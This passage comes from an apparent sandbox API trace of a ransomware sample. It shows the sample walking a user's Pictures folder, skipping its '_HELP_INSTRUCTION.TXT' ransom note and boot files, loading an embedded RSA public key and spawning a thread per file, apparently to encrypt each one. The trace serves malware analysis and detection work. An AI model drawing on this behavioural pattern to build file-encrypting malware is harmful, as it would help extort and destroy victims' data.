MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0123.464] lstrcpyW (in: lpString1=0x17cf1c, lpString2="d_ywXujVU Wq1E.jpg" | out: lpString1="d_ywXujVU Wq1E.jpg") returned="d_ywXujVU Wq1E.jpg" [0123.464] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0123.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e4 [0123.464] Sleep (dwMilliseconds=0x96) [0123.639] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0123.639] lstrcmpW (lpString1="E mrX_4M3P5jMLSuXG.bmp", lpString2="..") returned 1 [0123.639] lstrcmpW (lpString1="E mrX_4M3P5jMLSuXG.bmp", lpString2=".") returned 1 [0123.639] StrStrW (lpFirst="E mrX_4M3P5jMLSuXG.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0123.639] StrStrW (lpFirst="E mrX_4M3P5jMLSuXG.bmp", lpSrch="ntldr") returned 0x0 [0123.639] StrStrW (lpFirst="E mrX_4M3P5jMLSuXG.bmp", lpSrch="NTLDR") returned 0x0 [0123.639] StrStrW (lpFirst="E mrX_4M3P5jMLSuXG.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0123.639] StrStrW (lpFirst="E mrX_4M3P5jMLSuXG.bmp", lpSrch="ntdetect.com") returned 0x0 [0123.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0123.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0123.639] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0123.639] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0123.639] lstrcpyW (in: lpString1=0x17cf1c, lpString2="E mrX_4M3P5jMLSuXG.bmp" | out: lpString1="E mrX_4M3P5jMLSuXG.bmp") returned="E mrX_4M3P5jMLSuXG.bmp" [0123.639] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0123.639] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e8 [0123.640] Sleep (dwMilliseconds=0x96) [0123.807] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0123.807] lstrcmpW (lpString1="FFqA4 2WndIy.gif", lpString2="..") returned 1 [0123.807] lstrcmpW (lpString1="FFqA4 2WndIy.gif", lpString2=".") returned 1 [0123.807] StrStrW (lpFirst="FFqA4 2WndIy.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0123.807] StrStrW (lpFirst="FFqA4 2WndIy.gif", lpSrch="ntldr") returned 0x0 [0123.808] StrStrW (lpFirst="FFqA4 2WndIy.gif", lpSrch="NTLDR") returned 0x0 [0123.808] StrStrW (lpFirst="FFqA4 2WndIy.gif", lpSrch="NTDETECT.COM") returned 0x0 [0123.808] StrStrW (lpFirst="FFqA4 2WndIy.gif", lpSrch="ntdetect.com") returned 0x0 [0123.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0123.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0123.808] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0123.808] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0123.808] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FFqA4 2WndIy.gif" | out: lpString1="FFqA4 2WndIy.gif") returned="FFqA4 2WndIy.gif" [0123.808] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0123.808] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5d8 [0123.808] Sleep (dwMilliseconds=0x96) [0123.979] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0123.979] lstrcmpW (lpString1="fTtF.bmp", lpString2="..") returned 1 [0123.979] lstrcmpW (lpString1="fTtF.bmp", lpString2=".") returned 1 [0123.979] StrStrW (lpFirst="fTtF.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0123.979] StrStrW (lpFirst="fTtF.bmp", lpSrch="ntldr") returned 0x0 [0123.979] StrStrW (lpFirst="fTtF.bmp", lpSrch="NTLDR") returned 0x0 [0123.979] StrStrW (lpFirst="fTtF.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0123.979] StrStrW (lpFirst="fTtF.bmp", lpSrch="ntdetect.com") returned 0x0 [0123.979] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0123.979] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0123.979] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0123.979] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0123.979] lstrcpyW (in: lpString1=0x17cf1c, lpString2="fTtF.bmp" | out: lpString1="fTtF.bmp") returned="fTtF.bmp" [0123.979] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0123.979] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5dc [0123.980] Sleep (dwMilliseconds=0x96) [0124.156] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0124.156] lstrcmpW (lpString1="g43hR4r2QCQPskvQatT.png", lpString2="..") returned 1 [0124.156] lstrcmpW (lpString1="g43hR4r2QCQPskvQatT.png", lpString2=".") returned 1 [0124.156] StrStrW (lpFirst="g43hR4r2QCQPskvQatT.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0124.156] StrStrW (lpFirst="g43hR4r2QCQPskvQatT.png", lpSrch="ntldr") returned 0x0 [0124.157] StrStrW (lpFirst="g43hR4r2QCQPskvQatT.png", lpSrch="NTLDR") returned 0x0 [0124.157] StrStrW (lpFirst="g43hR4r2QCQPskvQatT.png", lpSrch="NTDETECT.COM") returned 0x0 [0124.157] StrStrW (lpFirst="g43hR4r2QCQPskvQatT.png", lpSrch="ntdetect.com") returned 0x0 [0124.157] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0124.157] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0124.157] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0124.157] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0124.157] lstrcpyW (in: lpString1=0x17cf1c, lpString2="g43hR4r2QCQPskvQatT.png" | out: lpString1="g43hR4r2QCQPskvQatT.png") returned="g43hR4r2QCQPskvQatT.png" [0124.157] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0124.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5c0 [0124.157] Sleep (dwMilliseconds=0x96) [0124.384] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0124.384] lstrcmpW (lpString1="ghz9u7C.png", lpString2="..") returned 1 [0124.384] lstrcmpW (lpString1="ghz9u7C.png", lpString2=".") returned 1 [0124.384] StrStrW (lpFirst="ghz9u7C.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0124.384] StrStrW (lpFirst="ghz9u7C.png", lpSrch="ntldr") returned 0x0 [0124.384] StrStrW (lpFirst="ghz9u7C.png", lpSrch="NTLDR") returned 0x0 [0124.384] StrStrW (lpFirst="ghz9u7C.png", lpSrch="NTDETECT.COM") returned 0x0 [0124.384] StrStrW (lpFirst="ghz9u7C.png", lpSrch="ntdetect.com") returned 0x0 [0124.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0124.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0124.384] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0124.384] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0124.384] lstrcpyW (in: lpString1=0x17cf1c, lpString2="ghz9u7C.png" | out: lpString1="ghz9u7C.png") returned="ghz9u7C.png" [0124.385] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0124.385] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5c4 [0124.385] Sleep (dwMilliseconds=0x96) [0124.585] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0124.586] lstrcmpW (lpString1="gpnG5_ q-ZTGc_4b76b.png", lpString2="..") returned 1 [0124.586] lstrcmpW (lpString1="gpnG5_ q-ZTGc_4b76b.png", lpString2=".") returned 1 [0124.586] StrStrW (lpFirst="gpnG5_ q-ZTGc_4b76b.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0124.586] StrStrW (lpFirst="gpnG5_ q-ZTGc_4b76b.png", lpSrch="ntldr") returned 0x0 [0124.586] StrStrW (lpFirst="gpnG5_ q-ZTGc_4b76b.png", lpSrch="NTLDR") returned 0x0 [0124.586] StrStrW (lpFirst="gpnG5_ q-ZTGc_4b76b.png", lpSrch="NTDETECT.COM") returned 0x0 [0124.586] StrStrW (lpFirst="gpnG5_ q-ZTGc_4b76b.png", lpSrch="ntdetect.com") returned 0x0 [0124.586] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0124.586] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0124.586] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0124.586] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0124.586] lstrcpyW (in: lpString1=0x17cf1c, lpString2="gpnG5_ q-ZTGc_4b76b.png" | out: lpString1="gpnG5_ q-ZTGc_4b76b.png") returned="gpnG5_ q-ZTGc_4b76b.png" [0124.586] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0124.586] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5d0 [0124.587] Sleep (dwMilliseconds=0x96) [0124.816] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0124.816] lstrcmpW (lpString1="hl35zcYZE.bmp", lpString2="..") returned 1 [0124.816] lstrcmpW (lpString1="hl35zcYZE.bmp", lpString2=".") returned 1 [0124.816] StrStrW (lpFirst="hl35zcYZE.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0124.816] StrStrW (lpFirst="hl35zcYZE.bmp", lpSrch="ntldr") returned 0x0 [0124.816] StrStrW (lpFirst="hl35zcYZE.bmp", lpSrch="NTLDR") returned 0x0 [0124.816] StrStrW (lpFirst="hl35zcYZE.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0124.816] StrStrW (lpFirst="hl35zcYZE.bmp", lpSrch="ntdetect.com") returned 0x0 [0124.816] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0124.816] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0124.816] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0124.816] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0124.816] lstrcpyW (in: lpString1=0x17cf1c, lpString2="hl35zcYZE.bmp" | out: lpString1="hl35zcYZE.bmp") returned="hl35zcYZE.bmp" [0124.816] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0124.816] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e0 [0124.817] Sleep (dwMilliseconds=0x96) [0125.014] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0125.014] lstrcmpW (lpString1="Hx4D_z73m1pGCpzIPXzy.bmp", lpString2="..") returned 1 [0125.014] lstrcmpW (lpString1="Hx4D_z73m1pGCpzIPXzy.bmp", lpString2=".") returned 1 [0125.014] StrStrW (lpFirst="Hx4D_z73m1pGCpzIPXzy.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0125.014] StrStrW (lpFirst="Hx4D_z73m1pGCpzIPXzy.bmp", lpSrch="ntldr") returned 0x0 [0125.014] StrStrW (lpFirst="Hx4D_z73m1pGCpzIPXzy.bmp", lpSrch="NTLDR") returned 0x0 [0125.015] StrStrW (lpFirst="Hx4D_z73m1pGCpzIPXzy.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0125.015] StrStrW (lpFirst="Hx4D_z73m1pGCpzIPXzy.bmp", lpSrch="ntdetect.com") returned 0x0 [0125.015] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0125.015] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0125.015] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0125.015] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN 